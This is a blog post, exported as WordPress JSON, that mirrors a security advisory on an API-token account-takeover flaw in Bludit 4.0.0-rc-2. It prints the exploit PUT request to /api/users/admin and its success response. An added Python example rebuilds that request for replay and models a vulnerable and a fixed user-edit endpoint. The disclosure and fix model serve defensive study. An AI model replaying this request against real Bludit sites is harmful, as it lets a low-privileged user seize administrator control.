{"id":40285,"date":"2023-04-11T19:01:00","date_gmt":"2023-04-11T15:01:00","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171808\/bludit400rc2-escalate.txt"},"modified":"2023-04-12T01:07:25","modified_gmt":"2023-04-11T20:37:25","slug":"bludit-4-0-0-rc-2-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/bludit-4-0-0-rc-2-privilege-escalation\/","title":{"rendered":"Bludit 4.0.0-rc-2 Privilege Escalation"},"content":{"rendered":"<p>## Title: Bludit-4.0.0-rc-2 &#8211; Release candidate 2 Account takeover:<br \/>\nAPI token vulnerability<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 04.11.2023<br \/>\n## Vendor: https:\/\/www.bludit.com\/<br \/>\n## Software: https:\/\/github.com\/bludit\/bludit\/releases\/tag\/4.0.0-rc-2<br \/>\n## Reference: https:\/\/www.cloudflare.com\/learning\/access-management\/account-takeover\/<br \/>\n## Reference: https:\/\/portswigger.net\/daily-swig\/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit<\/p>\n<p>## Description:<br \/>\nAn attacker who already holds a valid low-privileged account (here `pwned`) first sends the normal request that changes his own password.<br \/>\nHe then re-sends the same JSON `object`, still carrying his own API `token` and `authentication` values, but with the URL pointing at `\/api\/users\/admin`.<br \/>\nThe endpoint accepts the callers credentials for a target account that is not his own and overwrites the admin password,<br \/>\nso the attacker can log in as admin and take full control of the site.<\/p>\n<p>STATUS: HIGH Vulnerability<\/p>\n[+]Exploit:<br \/>\n```http<br \/>\nPUT \/api\/users\/admin HTTP\/1.1<br \/>\nHost: 127.0.0.1:8000<br \/>\nContent-Length: 138<br \/>\nsec-ch-ua: \"Not:A-Brand\";v=\"99\", \"Chromium\";v=\"112\"<br \/>\nsec-ch-ua-platform: \"Windows\"<br \/>\nsec-ch-ua-mobile: ?0<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/112.0.5615.50 Safari\/537.36<br \/>\ncontent-type: application\/json<br \/>\nAccept: *\/*<br \/>\nOrigin: 
http:\/\/127.0.0.1:8000<br \/>\nSec-Fetch-Site: same-origin<br \/>\nSec-Fetch-Mode: cors<br \/>\nSec-Fetch-Dest: empty<br \/>\nReferer: http:\/\/127.0.0.1:8000\/admin\/edit-user\/pwned<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<br \/>\nCookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui<br \/>\nConnection: close<\/p>\n<p>{\"token\":\"4f8df9f64e84fa4562ec3a604bf7985c\",\"authentication\":\"6d1a5510a53f9d89325b0cd56a2855a9\",\"username\":\"pwned\",\"password\":\"password1\"}<\/p>\n<p>```<\/p>\n[+]Response:<br \/>\n```http<br \/>\nHTTP\/1.1 200 OK<br \/>\nHost: 127.0.0.1:8000<br \/>\nDate: Tue, 11 Apr 2023 08:33:51 GMT<br \/>\nConnection: close<br \/>\nX-Powered-By: PHP\/7.4.30<br \/>\nAccess-Control-Allow-Origin: *<br \/>\nContent-Type: application\/json<\/p>\n<p>{\"status\":\"0\",\"message\":\"User edited.\",\"data\":{\"key\":\"admin\"}}<br \/>\n```<\/p>\n<p>## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/bludit\/2023\/Bludit-v4.0.0-Release-candidate-2)<\/p>\n<p>## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/w3aa4d)<\/p>\n<p>## Time spent:<br \/>\n00:57:00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Bludit-4.0.0-rc-2 &#8211; Release candidate 2 Account takeover: API token vulnerability ## Author: nu11secur1ty ## Date: 04.11.2023 ## Vendor: https:\/\/www.bludit.com\/ ## Software: https:\/\/github.com\/bludit\/bludit\/releases\/tag\/4.0.0-rc-2 ## Reference: https:\/\/www.cloudflare.com\/learning\/access-management\/account-takeover\/ ## Reference: https:\/\/portswigger.net\/daily-swig\/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit ## Description: The already authenticated attacker can send a normal request to change his password and then he can use the 
same JSON `object` and &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40285","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40285","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40285"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40285\/revisions"}],"predecessor-version":[{"id":40291,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40285\/revisions\/40291"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40285"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40285"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40285"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
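Added example, written for this page and not taken from nu11secur1ty's advisory or from the Bludit code base. Part 1 rebuilds the `PUT /api/users/<target>` request shown in the advisory so it can be replayed against a test instance with one's own low-privileged `token` and `authentication` values, and checks a response for the success shape the advisory shows. Part 2 is a hypothetical in-memory model of a user-edit endpoint, once without the ownership check (the behaviour the advisory demonstrates) and once with it; the user store, the role names, the `API_TOKEN` value and the error messages are all assumptions, and only the `"status": "0"` success convention is taken from the response above.

```python
"""Added example; not part of the advisory or of Bludit's code base.

Part 1: the client-side request from the advisory, rebuilt as data.
Part 2: a hypothetical server model of the missing authorization check.
The model is NOT Bludit's implementation; only the "status" convention
("0" = success) follows the response shown in the advisory.
"""
import hmac
import json
from typing import Dict, Optional, Tuple

# ---- Part 1: the client-side request, as shown in the advisory ----------

def build_edit_user_request(host: str, target_user: str, api_token: str,
                            auth_token: str, own_username: str,
                            new_password: str) -> Tuple[str, str, Dict[str, str], str]:
    """Return (method, path, headers, body).

    Only the path names the victim account; the JSON body is the one the
    attacker used to change his own password, exactly as the advisory says.
    """
    body = json.dumps(
        {"token": api_token, "authentication": auth_token,
         "username": own_username, "password": new_password},
        separators=(",", ":"))
    headers = {"Host": host, "Content-Type": "application/json",
               "Accept": "*/*", "Content-Length": str(len(body))}
    return "PUT", f"/api/users/{target_user}", headers, body


def edit_succeeded(response_body: str, target_user: str) -> bool:
    """True when a response has the success shape from the advisory."""
    try:
        data = json.loads(response_body)
    except ValueError:
        return False
    return (data.get("status") == "0"
            and isinstance(data.get("data"), dict)
            and data["data"].get("key") == target_user)


# ---- Part 2: hypothetical server model (constructed, not Bludit code) ----

API_TOKEN = "0123456789abcdef0123456789abcdef"  # constructed site-wide API token


def sample_users() -> Dict[str, Dict[str, str]]:
    """Constructed user store: username -> per-user auth token, role, password."""
    return {
        "admin": {"authentication": "a" * 32, "role": "admin", "password": "adminpass"},
        "pwned": {"authentication": "b" * 32, "role": "author", "password": "oldpass"},
    }


def caller_from_tokens(users, api_token: str, auth_token: str) -> Optional[str]:
    """Resolve the calling user; constant-time compares avoid leaking token bytes."""
    if not hmac.compare_digest(api_token, API_TOKEN):
        return None
    for name, rec in users.items():
        if hmac.compare_digest(rec["authentication"], auth_token):
            return name
    return None


def _apply_edit(users, target: str, fields: dict) -> dict:
    users[target]["password"] = fields["password"]
    return {"status": "0", "message": "User edited.", "data": {"key": target}}


def edit_user_vulnerable(users, target: str, body: str) -> dict:
    """Authenticates the caller, then edits whichever user the path names."""
    fields = json.loads(body)
    caller = caller_from_tokens(users, fields.get("token", ""), fields.get("authentication", ""))
    if caller is None or target not in users:
        return {"status": "1", "message": "Unauthorized."}
    return _apply_edit(users, target, fields)  # missing: may `caller` edit `target`?


def edit_user_fixed(users, target: str, body: str) -> dict:
    """Same flow, but the caller must be the target or hold the admin role."""
    fields = json.loads(body)
    caller = caller_from_tokens(users, fields.get("token", ""), fields.get("authentication", ""))
    if caller is None or target not in users:
        return {"status": "1", "message": "Unauthorized."}
    if caller != target and users[caller]["role"] != "admin":
        return {"status": "1", "message": "Forbidden: cannot edit another user."}
    return _apply_edit(users, target, fields)
```

Feeding `build_edit_user_request` the token, authentication, username and password values from the advisory yields a 138-byte body, matching the `Content-Length` in the captured request. Against the vulnerable model, the `pwned` credentials overwrite the admin password; against the fixed model the same body is rejected for `admin` but still accepted for the caller's own account and for an admin editing anyone.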